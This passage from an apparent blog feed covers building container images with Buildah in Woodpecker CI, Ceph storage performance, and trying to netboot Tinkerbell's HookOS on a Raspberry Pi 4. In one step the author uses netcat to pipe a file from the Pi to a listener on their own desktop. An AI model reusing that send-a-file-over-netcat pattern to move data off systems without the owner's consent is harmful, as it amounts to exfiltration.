</span></span><span style="display:flex;"><span>  <span style="color:#66d9ef">if</span> <span style="color:#f92672">[[</span> -z <span style="color:#e6db74">&#34;</span><span style="color:#e6db74">${</span>PLUGIN_PASSWORD<span style="color:#e6db74">}</span><span style="color:#e6db74">&#34;</span> <span style="color:#f92672">]]</span>; <span style="color:#66d9ef">then</span>
</span></span><span style="display:flex;"><span>    echo <span style="color:#e6db74">&#34;PLUGIN_PASSWORD not set, aborting.&#34;</span>
</span></span><span style="display:flex;"><span>    <span style="color:#66d9ef">return</span> <span style="color:#ae81ff">1</span>
</span></span><span style="display:flex;"><span>  <span style="color:#66d9ef">fi</span>
</span></span><span style="display:flex;"><span>
</span></span><span style="display:flex;"><span>  echo <span style="color:#e6db74">&#34;Logging in...&#34;</span>
</span></span><span style="display:flex;"><span>  buildah login -p <span style="color:#e6db74">&#34;</span><span style="color:#e6db74">${</span>PLUGIN_PASSWORD<span style="color:#e6db74">}</span><span style="color:#e6db74">&#34;</span> -u <span style="color:#e6db74">&#34;</span><span style="color:#e6db74">${</span>PLUGIN_USERNAME<span style="color:#e6db74">}</span><span style="color:#e6db74">&#34;</span> <span style="color:#e6db74">&#34;</span><span style="color:#e6db74">${</span>PLUGIN_REPO<span style="color:#e6db74">}</span><span style="color:#e6db74">&#34;</span> <span style="color:#f92672">||</span> <span style="color:#66d9ef">return</span> <span style="color:#ae81ff">1</span>
</span></span><span style="display:flex;"><span>  echo <span style="color:#e6db74">&#34;Creating manifest...&#34;</span>
</span></span><span style="display:flex;"><span>  buildah --root <span style="color:#e6db74">&#34;</span><span style="color:#e6db74">${</span>DATA_ROOT<span style="color:#e6db74">}</span><span style="color:#e6db74">&#34;</span> --storage-driver<span style="color:#f92672">=</span>vfs manifest create newimage <span style="color:#f92672">||</span> <span style="color:#66d9ef">return</span> <span style="color:#ae81ff">1</span>
</span></span><span style="display:flex;"><span>  <span style="color:#66d9ef">for</span> plt in <span style="color:#e6db74">${</span>PLATFORMS<span style="color:#e6db74">}</span>; <span style="color:#66d9ef">do</span>
</span></span><span style="display:flex;"><span>    echo <span style="color:#e6db74">&#34;Adding platform </span><span style="color:#e6db74">${</span>plt<span style="color:#e6db74">}</span><span style="color:#e6db74">...&#34;</span>
</span></span><span style="display:flex;"><span>    buildah --root <span style="color:#e6db74">&#34;</span><span style="color:#e6db74">${</span>DATA_ROOT<span style="color:#e6db74">}</span><span style="color:#e6db74">&#34;</span> --storage-driver<span style="color:#f92672">=</span>vfs manifest add newimage <span style="color:#e6db74">&#34;</span><span style="color:#e6db74">${</span>plt<span style="color:#e6db74">}</span><span style="color:#e6db74">:0.0&#34;</span> <span style="color:#f92672">||</span> <span style="color:#66d9ef">return</span> <span style="color:#ae81ff">1</span>
</span></span><span style="display:flex;"><span>  <span style="color:#66d9ef">done</span>
</span></span><span style="display:flex;"><span>
</span></span><span style="display:flex;"><span>  echo <span style="color:#e6db74">&#34;Pushing to registry...&#34;</span>
</span></span><span style="display:flex;"><span>  <span style="color:#66d9ef">for</span> tag in <span style="color:#e6db74">${</span>TAGS<span style="color:#e6db74">}</span>; <span style="color:#66d9ef">do</span>
</span></span><span style="display:flex;"><span>    buildah --root <span style="color:#e6db74">&#34;</span><span style="color:#e6db74">${</span>DATA_ROOT<span style="color:#e6db74">}</span><span style="color:#e6db74">&#34;</span> --storage-driver<span style="color:#f92672">=</span>vfs manifest push newimage docker://<span style="color:#e6db74">${</span>PLUGIN_REPO<span style="color:#e6db74">}</span>:<span style="color:#e6db74">${</span>tag<span style="color:#e6db74">}</span> <span style="color:#f92672">||</span> <span style="color:#66d9ef">return</span> <span style="color:#ae81ff">1</span>
</span></span><span style="display:flex;"><span>  <span style="color:#66d9ef">done</span>
</span></span><span style="display:flex;"><span>
</span></span><span style="display:flex;"><span>  buildah logout <span style="color:#e6db74">&#34;</span><span style="color:#e6db74">${</span>PLUGIN_REPO<span style="color:#e6db74">}</span><span style="color:#e6db74">&#34;</span>
</span></span><span style="display:flex;"><span>
</span></span><span style="display:flex;"><span>  <span style="color:#66d9ef">return</span> <span style="color:#ae81ff">0</span>
</span></span><span style="display:flex;"><span><span style="color:#f92672">}</span>
</span></span></code></pre></div><p>Here I need to do some more things than in the build step. First is the login,
which is done via <code>buildah login</code>. Something which slightly annoys me here is
the fact that Buildah only seems to support either interactive input of the
password, or providing it via a CLI flag, but not e.g. via an environment
variable.</p>
<p>When the login succeeds, the code iterates over all platforms and adds the
<code>$PLATFORM:0.0</code> image to the new manifest. Once that&rsquo;s all done, the resulting
manifest containing all the required platform&rsquo;s images is pushed to the repository
given in the <code>repo</code> option for the plugin.</p>
<p>I prefer having a plugin like this, because Woodpecker&rsquo;s &ldquo;command form&rdquo; steps
cannot re-use Yaml anchors like I was able to do here, so there would have
been a lot more repetition in the pipeline setups.</p>
<h2 id="performance">Performance</h2>
<p>After I got the plugin working, I started migrating my existing image builds over
to the new plugin. I started out with my <a href="https://www.fluentd.org/">Fluentd</a>
image, where I take the official Fluentd image and install a few additional
plugins into it before deploying into my Kubernetes cluster. The image file
looks like this:</p>
<div class="highlight"><pre tabindex="0" style="color:#f8f8f2;background-color:#272822;-moz-tab-size:4;-o-tab-size:4;tab-size:4;"><code class="language-dockerfile" data-lang="dockerfile"><span style="display:flex;"><span><span style="color:#66d9ef">ARG</span> fluentd_ver<span style="color:#960050;background-color:#1e0010">
</span></span></span><span style="display:flex;"><span><span style="color:#960050;background-color:#1e0010">
</span></span></span><span style="display:flex;"><span><span style="color:#960050;background-color:#1e0010"></span><span style="color:#66d9ef">FROM</span><span style="color:#e6db74"> fluent/fluentd:${fluentd_ver}</span><span style="color:#960050;background-color:#1e0010">
</span></span></span><span style="display:flex;"><span><span style="color:#960050;background-color:#1e0010">
</span></span></span><span style="display:flex;"><span><span style="color:#960050;background-color:#1e0010"></span><span style="color:#66d9ef">USER</span><span style="color:#e6db74"> root</span><span style="color:#960050;background-color:#1e0010">
</span></span></span><span style="display:flex;"><span><span style="color:#960050;background-color:#1e0010">
</span></span></span><span style="display:flex;"><span><span style="color:#960050;background-color:#1e0010"></span><span style="color:#66d9ef">RUN</span> ln -s /usr/bin/dpkg-split /usr/sbin/dpkg-split<span style="color:#960050;background-color:#1e0010">
</span></span></span><span style="display:flex;"><span><span style="color:#960050;background-color:#1e0010"></span><span style="color:#66d9ef">RUN</span> ln -s /usr/bin/dpkg-deb /usr/sbin/dpkg-deb<span style="color:#960050;background-color:#1e0010">
</span></span></span><span style="display:flex;"><span><span style="color:#960050;background-color:#1e0010"></span><span style="color:#66d9ef">RUN</span> ln -s /bin/rm /usr/sbin/rm<span style="color:#960050;background-color:#1e0010">
</span></span></span><span style="display:flex;"><span><span style="color:#960050;background-color:#1e0010"></span><span style="color:#66d9ef">RUN</span> ln -s /bin/tar /usr/sbin/tar<span style="color:#960050;background-color:#1e0010">
</span></span></span><span style="display:flex;"><span><span style="color:#960050;background-color:#1e0010">
</span></span></span><span style="display:flex;"><span><span style="color:#960050;background-color:#1e0010"></span><span style="color:#66d9ef">RUN</span> buildDeps<span style="color:#f92672">=</span><span style="color:#e6db74">&#34;sudo make gcc g++ libc-dev&#34;</span> apt-get update <span style="color:#ae81ff">\
</span></span></span><span style="display:flex;"><span><span style="color:#ae81ff"></span>	<span style="color:#f92672">&amp;&amp;</span> apt-get install -y --no-install-recommends $buildDeps curl <span style="color:#ae81ff">\
</span></span></span><span style="display:flex;"><span><span style="color:#ae81ff"></span>	<span style="color:#f92672">&amp;&amp;</span> gem install <span style="color:#ae81ff">\
</span></span></span><span style="display:flex;"><span><span style="color:#ae81ff"></span>       fluent-plugin-grafana-loki <span style="color:#ae81ff">\
</span></span></span><span style="display:flex;"><span><span style="color:#ae81ff"></span>       fluent-plugin-record-modifier <span style="color:#ae81ff">\
</span></span></span><span style="display:flex;"><span><span style="color:#ae81ff"></span>	     fluent-plugin-multi-format-parser <span style="color:#ae81ff">\
</span></span></span><span style="display:flex;"><span><span style="color:#ae81ff"></span>	     fluent-plugin-rewrite-tag-filter <span style="color:#ae81ff">\
</span></span></span><span style="display:flex;"><span><span style="color:#ae81ff"></span>	     fluent-plugin-route <span style="color:#ae81ff">\
</span></span></span><span style="display:flex;"><span><span style="color:#ae81ff"></span>	     fluent-plugin-http-healthcheck <span style="color:#ae81ff">\
</span></span></span><span style="display:flex;"><span><span style="color:#ae81ff"></span>	     fluent-plugin-kv-parser <span style="color:#ae81ff">\
</span></span></span><span style="display:flex;"><span><span style="color:#ae81ff"></span>	     fluent-plugin-parser-logfmt <span style="color:#ae81ff">\
</span></span></span><span style="display:flex;"><span><span style="color:#ae81ff"></span>	<span style="color:#f92672">&amp;&amp;</span> gem sources --clear-all <span style="color:#ae81ff">\
</span></span></span><span style="display:flex;"><span><span style="color:#ae81ff"></span>  <span style="color:#f92672">&amp;&amp;</span> SUDO_FORCE_REMOVE<span style="color:#f92672">=</span>yes <span style="color:#ae81ff">\
</span></span></span><span style="display:flex;"><span><span style="color:#ae81ff"></span>      apt-get purge -y --auto-remove <span style="color:#ae81ff">\
</span></span></span><span style="display:flex;"><span><span style="color:#ae81ff"></span>                    -o APT::AutoRemove::RecommendsImportant<span style="color:#f92672">=</span>false <span style="color:#ae81ff">\
</span></span></span><span style="display:flex;"><span><span style="color:#ae81ff"></span>                    $buildDeps <span style="color:#ae81ff">\
</span></span></span><span style="display:flex;"><span><span style="color:#ae81ff"></span>  <span style="color:#f92672">&amp;&amp;</span> rm -rf /var/lib/apt/lists/* <span style="color:#ae81ff">\
</span></span></span><span style="display:flex;"><span><span style="color:#ae81ff"></span>  <span style="color:#f92672">&amp;&amp;</span> rm -rf /tmp/* /var/tmp/* /usr/lib/ruby/gems/*/cache/*.gem<span style="color:#960050;background-color:#1e0010">
</span></span></span><span style="display:flex;"><span><span style="color:#960050;background-color:#1e0010">
</span></span></span><span style="display:flex;"><span><span style="color:#960050;background-color:#1e0010"></span><span style="color:#66d9ef">USER</span><span style="color:#e6db74"> fluent</span><span style="color:#960050;background-color:#1e0010">
</span></span></span></code></pre></div><p>And that&rsquo;s where I discovered that my performance wasn&rsquo;t exactly up to snuff
still:
<figure>
    <img loading="lazy" src="shared-disk-build.png"
         alt="A screenshot of Woodpecker&#39;s CI run UI. On the left, it shows the Fluentd build and its steps. The clone steps finishes in 15s, but the two build steps for amd64 and arm64 take 22:57 and 23:32 respectively. The final &#39;push image&#39; steps takes 04:49 minutes and failed. To the right are some logs of the adm64 image build, showing the executed buildah command and the initial pull of the fluentd/fluentd:v1.19.0-debian-1.0 image. To the very right of the output, a relative timestamp shows that the first step after the image pull, &#39;USER root&#39;, happens 1087s after the start of the step&#39;s run."/> <figcaption>
            <p>The fluentd image build takes around 23 minutes, with the lion&rsquo;s share of 1087s/18 minutes taken by the pull of the fluentd image.</p>
        </figcaption>
</figure>

So here is a problem: The Fluentd build takes over 23 minutes. That&rsquo;s a lot, and
from the logs it looks like the initial image pull of the official Fluentd image
takes 18 minutes on its own. Even though not shown here, it&rsquo;s a similar situation
on the arm64 build. I checked my connection, and the image was pulled from my local
Harbor pull-through cache, it was not just a case of DockerHub being slow.</p>
<p>The problem here again seems to be CephFS and/or the nature of container images
on disk. Because for a long time, the Ceph cluster was adding 10k objects per
15s interval:
<figure>
    <img loading="lazy" src="cephfs-buildah-run.png"
         alt="A screenshot of a Grafana time series plot. It shows the object count changes per Ceph pool. Of interest here is the CephFS bulk pool. Starting at about 10:32, it produces 10k new objects per 15s, and does so almost continuously until 10:54."/> <figcaption>
            <p>Objects added in a 15s interval to the pools of my Ceph cluster. Orange/top line is my CephFS storage pool.</p>
        </figcaption>
</figure>

In total, this single two-image build added about 180k objects to the cluster:
<figure>
    <img loading="lazy" src="objects-in-cluster.png"
         alt="Another screenshot of a Grafana time series plot. This time it shows the number of objects in the entire cluster. It starts out at about 2.03 million objects. At around 10:32, it starts rising at a pretty consistent rate, until it hits its peak of about 2.20 million objects at around 10:54. Afterwards, it&#39;s stable for a little while at around 2.19 million, before it goes down steadily again to the previous 2.03 million in the span of just 10 minutes."/> <figcaption>
            <p>The CI run produced about 180k new objects in the Ceph storage cluster.</p>
        </figcaption>
</figure>
</p>
<p>After seeing all of this, I decided that the current setup might not be ideal
when it comes to storage. One thought I had was that both builds using the same
<code>--root</code> parameter on the shared volume might be part of the problem, thinking
that perhaps Buildah did some locking of the storage area?
So I switched the different platform builds to different directories on the
shared volume. That did work somewhat, reducing the duration down to about 15
minutes:
<figure>
    <img loading="lazy" src="separate-dirs-build.png"
         alt="Another screenshot of the Woodpecker UI, showing the same Fluentd build as before. This time, the amd64 and arm64 image build steps only took 15:06 and 14:56 respectively. The push image step still failed. The relative timestamp on the right now shows that the &#39;USER root&#39; step of the Dockerfile started after 659 seconds this time."/> <figcaption>
            <p>Still with a shared volume, but not with a shared directory on that volume, the builds take less time.</p>
        </figcaption>
</figure>

The builds go from about 24 minutes to only 15 minutes. The initial pull of the
Fluentd image goes down to about 11 minutes, from the previous 18 minutes.</p>
<p>This still seemed pretty long, so I started to consider the creation of a new
CephFS with the data pool on SSDs, to hopefully improve the performance. But then
I had a thought: How about removing the parallelism entirely?
If I were to not run the steps in parallel, I could use a Ceph RBD instead,
which would likely already be faster. I also already have a StorageClass for
SSD-backed RBDs in my cluster, so no additional config would be necessary.
And finally, using a Ceph RBD instead of CephFS, I would be able to use the faster
OverlayFS storage driver for Buildah.</p>
<p>So I did all of that, switched the StorageClass for Woodpecker&rsquo;s pipeline volumes
to my SSD RBD class, and then disabled parallelism for the steps. The results
were rather impressive:
<figure>
    <img loading="lazy" src="finally-fast.png"
         alt="Another screenshot of the Woodpecker UI, this time showing the image build steps only taking 01:42 minutes and 01:53 minutes. The push image step is successful now as well, taking 02:07 minutes. To the right, the logs of the image pull for the Fluentd image are shown again. The pull now took only 18s."/> <figcaption>
            <p>Both builds done sequentially on an SSD-backed Ceph RBD are faster than the same builds done in parallel, but on a CephFS volume with the VFS storage driver.</p>
        </figcaption>
</figure>
</p>
<p>The entire pipeline has run through in about six minutes. Less time than the previous
setup needed just for pulling down the Fluentd image.</p>
<h2 id="final-thoughts">Final thoughts</h2>
<p>Even with all the weird errors I had to fix and the wrong turns I took, this
was fun, and the fact that I ended up without any parallelism was surprising.
I really enjoyed working on this one.</p>
<p>There are still a few improvements to be made, and some things to dig into. One
burning question I currently have is why the parallelized version, using the
VFS storage driver running on a CephFS shared volume, was so much slower. Was it
mostly the slower VFS storage driver? Or was it CephFS? And if it was CephFS,
what was actually the bottleneck? Because I wasn&rsquo;t able to find one, neither in
IO utilization, nor network, nor CPU on any of the nodes involved. I checked
both, the nodes running the Buildah Pods and the Ceph nodes, and none seemed to
show any overloads in any resource. So I&rsquo;m a bit stumped.</p>
<p>Then there&rsquo;s also the fact that my Woodpecker steps still need to run in privileged
mode. I don&rsquo;t like that, but I wasn&rsquo;t able to figure out exactly what to do to
remove that requirement. From everything I&rsquo;ve read, this should be possible with
Buildah, but might need some additional configuration on the Kubernetes nodes.
I will have to check this in the future.</p>
<p>But for now, finally back to working on setting up a Bookwyrm instance.</p>
]]></content:encoded>
    </item>
    <item>
      <title>Tinkerbell Part V: Booting HookOS on a Pi 4</title>
      <link>https://blog.mei-home.net/posts/tinkerbell-5-hookos-direct-boot/</link>
      <pubDate>Tue, 15 Jul 2025 22:50:11 +0200</pubDate>
      <guid>https://blog.mei-home.net/posts/tinkerbell-5-hookos-direct-boot/</guid>
      <description>I&amp;#39;m trying to boot Tinkerbell&amp;#39;s HookOS on a Pi 4 without iPXE/EFI</description>
      <content:encoded><![CDATA[<p>In this post, I will describe my failed attempts of booting Tinkerbell&rsquo;s in-memory
HookOS directly on a Pi 4, without iPXE or UEFI.</p>
<p>This is part 5 of my <a href="https://blog.mei-home.net/tags/series-tinkerbell/">Tinkerbell series</a>.</p>
<p>In my <a href="https://blog.mei-home.net/posts/tinkerbell-4-provisioning-pi4/">previous post</a>, I
described how I provisioned a Pi 4 using Tinkerbell&rsquo;s standard way via UEFI
and iPXE. This was a complicated and convoluted process, requiring heavy use of
Dnsmasq on the side and bouncing between requests to said Dnsmasq and Tinkerbell
itself. In the end, I was only able to do it after completely switching off
Tinkerbell&rsquo;s DHCP functionality. I wasn&rsquo;t particularly fond of that option,
because I quite liked how it worked for provisioning the VM in my first
experiments. I didn&rsquo;t want to completely switch off DHCP in Tinkerbell just
because of the Pi 4.</p>
<p>Another pretty big issue was the Pi 5. From everything I could see, the
<a href="https://github.com/worproject/rpi5-uefi">Pi 5 UEFI project</a> is dead right now.
So working with iPXE/UEFI was not possible for the Pi 5 anyway, and I&rsquo;m already
running three of those and I&rsquo;m planning to add a fourth.</p>
<h2 id="the-potential-solution-with-direct-boot">The potential solution with direct boot</h2>
<p>So I took a look at what Tinkerbell&rsquo;s provisioning actually does. It&rsquo;s core part
is the Tink workflow engine, running on <a href="https://github.com/tinkerbell/hook">HookOS</a>.
This is Tinkerbell&rsquo;s in-memory provisioning OS. The only task it has is to provide
a Linux environment with Docker to run the provisioning tasks. And it&rsquo;s not a
special Linux really, just one which runs entirely from the initramfs.</p>
<p>So the only thing I really needed was the ability to boot into the HookOS kernel,
which again, isn&rsquo;t actually anything special, and then run HookOS&rsquo; initramfs.
And that&rsquo;s already possible with the Pi&rsquo;s netboot mechanism. You can provide
the name of a kernel and an initramfs, and the Pi&rsquo;s firmware will download those
from the TFTP server it receives during DHCP discovery. This is at least a simpler
approach than needing to work with UEFI and iPXE. And it has the advantage that
it should also work with the Pi 5.</p>
<p>There are a couple of additional issues with this solution, mainly that I would
still like a tighter connection with Tinkerbell&rsquo;s DHCP side. But for now, I&rsquo;m
mostly interested in seeing what my overall options with Tinkerbell and the
Raspberry Pi&rsquo;s netboot process are. Then I will think a bit more about potential
changes I could propose to the Tinkerbell project.</p>
<h2 id="trying-the-official-hookos-release">Trying the official HookOS release</h2>
<p>The newest HookOS release is <a href="https://github.com/tinkerbell/hook/releases/tag/v0.10.0">v0.10.0</a>,
so I started with that one. Besides the standard x86_64 and aarch64 kernels,
HookOS also provides a version with <a href="https://www.armbian.com/">Armbian&rsquo;s</a>
Raspberry Pi kernel and an initramfs build for aarch64. I started with that one.</p>
<p>In preparation, I downloaded the <code>hook_armbian-bcm2711-current.tar.gz</code> file from
HookOS, which contains the kernel and initramfs. But this leaves some Pi specific
files out, which are also needed when netbooting a Pi. I decided to get those
files from Armbian as well, namely <a href="https://www.armbian.com/rpi4b/">this page</a>.
I choose the &ldquo;Minimal/IoT&rdquo; image. Then I mounted the image locally to get at the
content of the boot partition:</p>
<div class="highlight"><pre tabindex="0" style="color:#f8f8f2;background-color:#272822;-moz-tab-size:4;-o-tab-size:4;tab-size:4;"><code class="language-shell" data-lang="shell"><span style="display:flex;"><span>losetup -f --show -P Armbian_25.5.1_Rpi4b_noble_current_6.12.28_minimal.img
</span></span><span style="display:flex;"><span>mount /dev/loop0p1 /mnt/temp/
</span></span></code></pre></div><p>This then allowed me to copy a couple of files, namely:</p>
<ul>
<li><code>bcm2711-rpi-4-b.dtb</code> (that was the only dtb I copied, because I&rsquo;m working only with a Pi 4b for now)</li>
<li><code>cmdline.txt</code></li>
<li><code>config.txt</code></li>
<li><code>fixup4*</code></li>
<li><code>start4*</code></li>
</ul>
<p>The next challenge was the kernel command line. Tinkerbell provides a few
important values through the kernel command line when booting via its iPXE
script, so I booted the Pi with iPXE again and wanted to copy the kernel command
line. But I did not have direct access to the Pi from my desktop, because HookOS
doesn&rsquo;t run SSH by default. I was using it through a separate keyboard and display.</p>
<p>At that point I had to sit back for a few minutes and consider my life choices
a bit. Because with all the services I&rsquo;ve got running in my Homelab, all the
Kubernetes clusters, the Ceph storage clusters, the myriad of apps - I somehow
did not have a no-frills, zero config way to share a copy+paste of the kernel
command line from one host to another. I was a bit disappointed in myself.</p>
<p>But then, I had an excellent idea, if I may say so myself: <a href="https://en.wikipedia.org/wiki/Netcat">Netcat!</a>.
It can do simple TCP transfer. So I launched this command on my desktop:</p>
<div class="highlight"><pre tabindex="0" style="color:#f8f8f2;background-color:#272822;-moz-tab-size:4;-o-tab-size:4;tab-size:4;"><code class="language-shell" data-lang="shell"><span style="display:flex;"><span>nc -l -p <span style="color:#ae81ff">1234</span> &gt; out.txt
</span></span></code></pre></div><p>And then, on the Pi booted into HookOS, I ran this:</p>
<pre tabindex="0"><code>dmesg &gt; out.txt
nc -w 3 198.51.100.25 1234 &lt; out.txt
</code></pre><p>And just like that, I had the data available on my desktop. I&rsquo;m honestly a bit
enamored with myself for coming up with this rather simple and expedient solution. &#x1f601;</p>
<p>The important bits of the command line looked like this:</p>
<div class="highlight"><pre tabindex="0" style="color:#f8f8f2;background-color:#272822;-moz-tab-size:4;-o-tab-size:4;tab-size:4;"><code class="language-shell" data-lang="shell"><span style="display:flex;"><span>tink_worker_image<span style="color:#f92672">=</span>ghcr.io/tinkerbell/tink-agent:v0.18.3-b817f7f2 facility<span style="color:#f92672">=</span> syslog_host<span style="color:#f92672">=</span>203.0.113.200 grpc_authority<span style="color:#f92672">=</span>203.0.113.200:42113 tinkerbell_tls<span style="color:#f92672">=</span>false tinkerbell_insecure_tls<span style="color:#f92672">=</span>false worker_id<span style="color:#f92672">=</span>e4:5f:01:bc:f4:ce hw_addr<span style="color:#f92672">=</span>e4:5f:01:bc:f4:ce modules<span style="color:#f92672">=</span>loop,squashfs,sd-mod,usb-storage initrd<span style="color:#f92672">=</span>initramfs-aarch64
</span></span></code></pre></div><p>I added those Tinkerbell-specific options to the <code>cmdline.txt</code> file in the
TFTP directory and also adapted the <code>config.txt</code>, setting the HookOS kernel and
initramfs:</p>
<pre tabindex="0"><code>[all]
kernel=vmlinuz-armbian-bcm2711-current
initramfs initramfs-armbian-bcm2711-current followkernel
</code></pre><p>With all of that done, I booted the Pi up. While the kernel booted and the
containerd in the initramfs was also started, there was no shell, and in the
Tinkerbell logs I did not see any attempt by the Pi to contact Tinkerbell. I did
not even see an attempt to get an IP via DHCP after the netboot part was done.
The only error message I could see on the small screen I was using was this one:</p>
<pre tabindex="0"><code>Failed to read service spec error &#34;open /containers/services/getty/config.json: No such file or directory&#34;
</code></pre><p>Considering that getty is what provides the shell, at least I now knew
why I wasn&rsquo;t getting a prompt. So I unpacked the initramfs with this command
to make sure the file was actually there:</p>
<div class="highlight"><pre tabindex="0" style="color:#f8f8f2;background-color:#272822;-moz-tab-size:4;-o-tab-size:4;tab-size:4;"><code class="language-shell" data-lang="shell"><span style="display:flex;"><span>gunzip -c initramfs-armbian-bcm2711-current | cpio -i
</span></span></code></pre></div><p>And yes, the file does actually exist in the initramfs. So what&rsquo;s going on here?
My main problem was that I wasn&rsquo;t getting a shell, so I didn&rsquo;t have any good
way to get at the rest of the boot messages, to see whether there was another
error.
So I went for a bad way instead: Filming the small screen I had connected to the
Pi. As you might imagine, this wasn&rsquo;t a great solution. One, I had to transfer
the video to my desktop via Nextcloud, because I couldn&rsquo;t properly read
anything on my phone&rsquo;s screen. Then there&rsquo;s the problem that the video is taken
at a certain framerate, and sometimes the logs scrolled by too quickly to catch
everything.</p>
<p>This is what all too much of the video looked like:</p>
<figure>
    <img loading="lazy" src="unreadable-output.jpg"
         alt="A picture of a small screen showing Linux kernel startup logs. The output is all jumbled up, with previous lines still partially visible, faded under the current lines."/> <figcaption>
            <p>Not really readable output from trying to take a video of the boot process.</p>
        </figcaption>
</figure>

<p>But I still got a bit more out of it, most importantly this message:</p>
<pre tabindex="0"><code>rootfs image is not initramfs (read error): looks like an initrd
</code></pre><p>But that was less than helpful. At least on my desktop, the initramfs looked
perfectly fine, no issues packaging it up at all.</p>
<p>But while fudging with kernel command line options and the <code>config.txt</code> content,
to no avail at all, I suddenly saw the <code>console=</code> option. And realized that I
could make my life at least a bit easier. I got out my trusty USB-to-Serial
adapter and followed <a href="https://www.jeffgeerling.com/blog/2021/attaching-raspberry-pis-serial-console-uart-debugging">this tutorial</a>
to get it attached to the Pi. After adding <code>console=serial0,115200</code> to the
kernel command line, I was then able to connect to the Pi via serial console.
I used minicom on my desktop, where the serial adapter showed up as <code>/dev/ttyUSB0</code>:</p>
<div class="highlight"><pre tabindex="0" style="color:#f8f8f2;background-color:#272822;-moz-tab-size:4;-o-tab-size:4;tab-size:4;"><code class="language-shell" data-lang="shell"><span style="display:flex;"><span>minicom -b <span style="color:#ae81ff">115200</span> -D /dev/ttyUSB0
</span></span></code></pre></div><p>And just like that, I had all of the boot time messages on my desktop and no
longer needed to film the boot process.</p>
<p>But I still wasn&rsquo;t really getting anywhere, the errors stayed the same. I also
tried a few other kernels, thinking that there might be something wrong with the
HookOS kernel. I tried for example the Ubuntu kernel I use for my production
Pis, but to no avail. The error stayed the same.</p>
<p>So I decided I would dig into HookOS and <a href="https://github.com/linuxkit/linuxkit">LinuxKit</a>,
which HookOS is based on.</p>
<h2 id="trying-a-newer-kernel">Trying a newer kernel</h2>
<p>Still having no idea what&rsquo;s going on, I decided to try a newer kernel. The
last HookOS release was from November 2024, so I figured perhaps something
changed.</p>
<p>And at this point, I have to send a really big kudos to the Tinkerbell team
for HookOS&rsquo; builds. I was perfectly prepared to spend some time to get my VM set
up properly to actually build HookOS successfully. But I didn&rsquo;t need to. Quite
to the contrary. Most dependencies were automatically installed, and everything
went very smoothly. I was rather impressed. &#x1f44d;</p>
<p>So for the experiment, I cloned the <a href="https://github.com/tinkerbell/hook">HookOS repo</a>
locally and switched into it. Then I had to manually install a few tools which
were missing:</p>
<div class="highlight"><pre tabindex="0" style="color:#f8f8f2;background-color:#272822;-moz-tab-size:4;-o-tab-size:4;tab-size:4;"><code class="language-shell" data-lang="shell"><span style="display:flex;"><span>apt install docker.io docker-buildx
</span></span></code></pre></div><p>Then I just executed the build script:</p>
<div class="highlight"><pre tabindex="0" style="color:#f8f8f2;background-color:#272822;-moz-tab-size:4;-o-tab-size:4;tab-size:4;"><code class="language-shell" data-lang="shell"><span style="display:flex;"><span>./build.sh kernel armbian-bcm2711-current
</span></span></code></pre></div><p>This installed a few additional dependencies via apt, and then build an OCI
image with the newest Armbian Pi kernel. Then, to build the full HookOS, including
device trees and initramfs, I ran this command:</p>
<div class="highlight"><pre tabindex="0" style="color:#f8f8f2;background-color:#272822;-moz-tab-size:4;-o-tab-size:4;tab-size:4;"><code class="language-shell" data-lang="shell"><span style="display:flex;"><span>./build.sh build armbian-bcm2711-current
</span></span></code></pre></div><p>At the time I executed the commands, the Armbian kernel I got was <code>6.12.35-S8292-Dbdda-P0000-Ce6dbH2313-HK01ba-Vc222-Ba566-R448a</code>.
The build results in an <code>out/</code> directory in the local dir, which contains the
device tree, Raspberry Pi overlays and kernel+initramfs. I copied it all into
my TFTP directory and tried to boot the Pi again. But yet again, I did get a
boot and containerd startup, but no prompt.</p>
<p>In a last desperate attempt, I tried with a <code>5.15</code> kernel from Armbian&rsquo;s
<code>kernel-bcm2711-legacy</code>, but that also ran into exactly the same issue.</p>
<h2 id="mangling-hookos">Mangling HookOS</h2>
<p>After a while of fruitlessly playing around, I started reading more and more
Google hits talking about truncation of initramfs by some implementations. So
I decided to try to reduce the size by re-compressing the initramfs with zstd.
That only reduced the size of the initramfs down to 122 MB, but it did something
more important: It confirmed the truncation theory via this kernel message:</p>
<pre tabindex="0"><code>rootfs image is not initramfs (ZSTD-compressed data is truncated); looks like an initrd
[...]
RAMDISK: zstd image found at block 0
RAMDISK: incomplete write (-28 != 131072)
</code></pre><p>This error indicates that the initramfs compression was correctly recognized,
but the data was truncated. I finally had proper proof that truncation was the
problem.</p>
<p>For further investigation, I adapted HookOS a bit to ensure that Getty gets
launched early in the boot process, in the hope that I would get a prompt and
could look around.</p>
<p>LinuxKit, the dockerized Linux distro HookOS is build upon, has a template file
which describes what to put into the initramfs. The one for HookOS looks like
this:</p>
<div class="highlight"><pre tabindex="0" style="color:#f8f8f2;background-color:#272822;-moz-tab-size:4;-o-tab-size:4;tab-size:4;"><code class="language-yaml" data-lang="yaml"><span style="display:flex;"><span><span style="color:#f92672">kernel</span>:
</span></span><span style="display:flex;"><span>  <span style="color:#f92672">image</span>: <span style="color:#e6db74">&#34;${HOOK_KERNEL_IMAGE}&#34;</span>
